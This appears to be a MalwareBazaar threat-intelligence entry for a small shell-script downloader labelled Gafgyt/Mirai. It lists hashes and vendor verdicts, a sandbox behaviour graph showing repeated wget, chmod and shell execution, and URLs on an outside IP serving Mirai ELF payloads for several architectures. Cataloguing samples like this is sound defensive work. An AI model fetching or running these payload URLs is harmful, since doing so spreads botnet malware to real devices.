MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c
SHA3-384 hash: dd55cf2e09ef43247a2f780c7b47406f332784cdf6e910384107a47b647b121183f10ffffbd74080031c3f42443a79ec
SHA1 hash: 4c3a600f1cfcdb3c3d795fd578bda55d9e493ab8
MD5 hash: ce20721239b241ae14a94ca0f71209ec
humanhash: dakota-eighteen-mockingbird-north
File name:toto
Download: download sample
Signature Gafgyt
Create hunting rule
File size:328 bytes
First seen:2025-08-24 02:41:18 UTC
Last seen:2025-08-24 17:20:15 UTC
File type: sh
MIME type:text/plain
ssdeep 3:6SDiMLRJKTZFGBzSEyLTUWOqMLRJK88BzSE8eUrKKVMLRJKJSINXsFRKRqMLRJKF:5DBleCIm5l2KalbsPliLklIFa0LKiZ
TLSH T116E04F8975D2E1FE89258E00F262173AD506F6C02160EF9CA64674758CDA5013124F47
Magika txt
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.176.20.59/mips7cd5fb5b6d94ac2acf16f8904f6f307f47710df1d51129d55e70590a52dcf823 Miraielf gafgyt mips mirai ua-wget
http://103.176.20.59/mpsle4acbf0a1448e928ea7714cf90692001c454b37d78b13a955f475568b36bbaec Miraielf mips mirai ua-wget
http://103.176.20.59/arm48a235a9336092da5a5fd75dc7c04bf109a796cab8cbe52666f972c2c5f3ff285 Miraiarm elf mirai ua-wget
http://103.176.20.59/arm516877e8cab68f6d6a557b0bee1e41a6d938997cb31a62cfe017ed21867b41801 Miraiarm elf mirai ua-wget
http://103.176.20.59/arm70fd1878b69312fbf748d3be8ba65b3431083985fcfe65a3b32a74a8ef69cdf89 Miraiarm elf mirai ua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
45
Origin country :
DE DE
Vendor Threat Intelligence
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/68aa7be87137d6845839aebc/reports/28427781-fc08-4ac5-b46d-7c4ca5be87e7/overview
Verdict:
Malicious
Labled as:
TrojanDownloader/Linux.Agent
Link:
https://www.hybrid-analysis.com/sample/1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c
Verdict:
Malicious
File Type:
text
First seen:
2025-08-24T03:34:00Z UTC
Last seen:
2025-08-24T03:34:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/f539560b-a521-43da-b739-4cbe19b4e6b4
Behavior Graph:
Download SVG
%3 guuid=939ace74-1900-0000-ea62-6aa6cf0f0000 pid=4047 /usr/bin/sudo guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056 /tmp/sample.bin guuid=939ace74-1900-0000-ea62-6aa6cf0f0000 pid=4047->guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056 execve guuid=4df6d976-1900-0000-ea62-6aa6da0f0000 pid=4058 /usr/bin/wget net send-data write-file guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=4df6d976-1900-0000-ea62-6aa6da0f0000 pid=4058 execve guuid=e5c733f7-1900-0000-ea62-6aa63b110000 pid=4411 /usr/bin/chmod guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=e5c733f7-1900-0000-ea62-6aa63b110000 pid=4411 execve guuid=5f189ff7-1900-0000-ea62-6aa63d110000 pid=4413 /usr/bin/dash guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=5f189ff7-1900-0000-ea62-6aa63d110000 pid=4413 clone guuid=6f8872f8-1900-0000-ea62-6aa641110000 pid=4417 /usr/bin/wget net send-data write-file guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=6f8872f8-1900-0000-ea62-6aa641110000 pid=4417 execve guuid=678e9f39-1a00-0000-ea62-6aa691110000 pid=4497 /usr/bin/chmod guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=678e9f39-1a00-0000-ea62-6aa691110000 pid=4497 execve guuid=279d433a-1a00-0000-ea62-6aa692110000 pid=4498 /usr/bin/dash guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=279d433a-1a00-0000-ea62-6aa692110000 pid=4498 clone guuid=d69ae83a-1a00-0000-ea62-6aa695110000 pid=4501 /usr/bin/wget net send-data write-file guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=d69ae83a-1a00-0000-ea62-6aa695110000 pid=4501 execve guuid=ef3da96f-1a00-0000-ea62-6aa63a120000 pid=4666 /usr/bin/chmod guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=ef3da96f-1a00-0000-ea62-6aa63a120000 pid=4666 execve guuid=6b7bfd6f-1a00-0000-ea62-6aa63c120000 pid=4668 /usr/bin/dash guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=6b7bfd6f-1a00-0000-ea62-6aa63c120000 pid=4668 clone guuid=4894d471-1a00-0000-ea62-6aa645120000 pid=4677 /usr/bin/wget net send-data write-file guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=4894d471-1a00-0000-ea62-6aa645120000 pid=4677 execve guuid=64848de6-1a00-0000-ea62-6aa639130000 pid=4921 /usr/bin/chmod guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=64848de6-1a00-0000-ea62-6aa639130000 pid=4921 execve guuid=4d6515e7-1a00-0000-ea62-6aa63b130000 pid=4923 /usr/bin/dash guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=4d6515e7-1a00-0000-ea62-6aa63b130000 pid=4923 clone guuid=a168a6e9-1a00-0000-ea62-6aa642130000 pid=4930 /usr/bin/wget net send-data write-file guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=a168a6e9-1a00-0000-ea62-6aa642130000 pid=4930 execve guuid=9ca36c2f-1b00-0000-ea62-6aa6ce130000 pid=5070 /usr/bin/chmod guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=9ca36c2f-1b00-0000-ea62-6aa6ce130000 pid=5070 execve guuid=1dd5df2f-1b00-0000-ea62-6aa6d0130000 pid=5072 /usr/bin/dash guuid=973c9976-1900-0000-ea62-6aa6d80f0000 pid=4056->guuid=1dd5df2f-1b00-0000-ea62-6aa6d0130000 pid=5072 clone 58517d70-7b02-5fe6-86d3-049c9f17a9ed 103.176.20.59:80 guuid=4df6d976-1900-0000-ea62-6aa6da0f0000 pid=4058->58517d70-7b02-5fe6-86d3-049c9f17a9ed send: 132B guuid=6f8872f8-1900-0000-ea62-6aa641110000 pid=4417->58517d70-7b02-5fe6-86d3-049c9f17a9ed send: 132B guuid=d69ae83a-1a00-0000-ea62-6aa695110000 pid=4501->58517d70-7b02-5fe6-86d3-049c9f17a9ed send: 132B guuid=4894d471-1a00-0000-ea62-6aa645120000 pid=4677->58517d70-7b02-5fe6-86d3-049c9f17a9ed send: 132B guuid=a168a6e9-1a00-0000-ea62-6aa642130000 pid=4930->58517d70-7b02-5fe6-86d3-049c9f17a9ed send: 132B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c/
Threat name:
Linux.Worm.Mirai
Create hunting rule
Status:
Malicious
First seen:
2025-08-24 03:12:10 UTC
File Type:
Text (Shell)
AV detection:
10 of 24 (41.67%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=dxh5yzwxxhumcrotwbl5jio54uzlnan5jiwrexkf6skckocurz6a._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250824-hy3kqsen5t/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh 1dcfdc66d7b9e8c145d3b057d4a1dde532b681bd4a2d125d45f4942538548e7c

(this sample)

Gafgyt

elf 6412011a49cc5f96c04fca7df6a71fa7ed0b9eddaa2eb8703cc8daab646d14b4

  
URLhaus
https://urlhaus.abuse.ch/url/3591802/
  
Delivery method
Distributed via web download
  
Dropping
MD5 44b8d531c504555c370c0b4cc154d53e
  
Dropping
SHA256 6412011a49cc5f96c04fca7df6a71fa7ed0b9eddaa2eb8703cc8daab646d14b4

Comments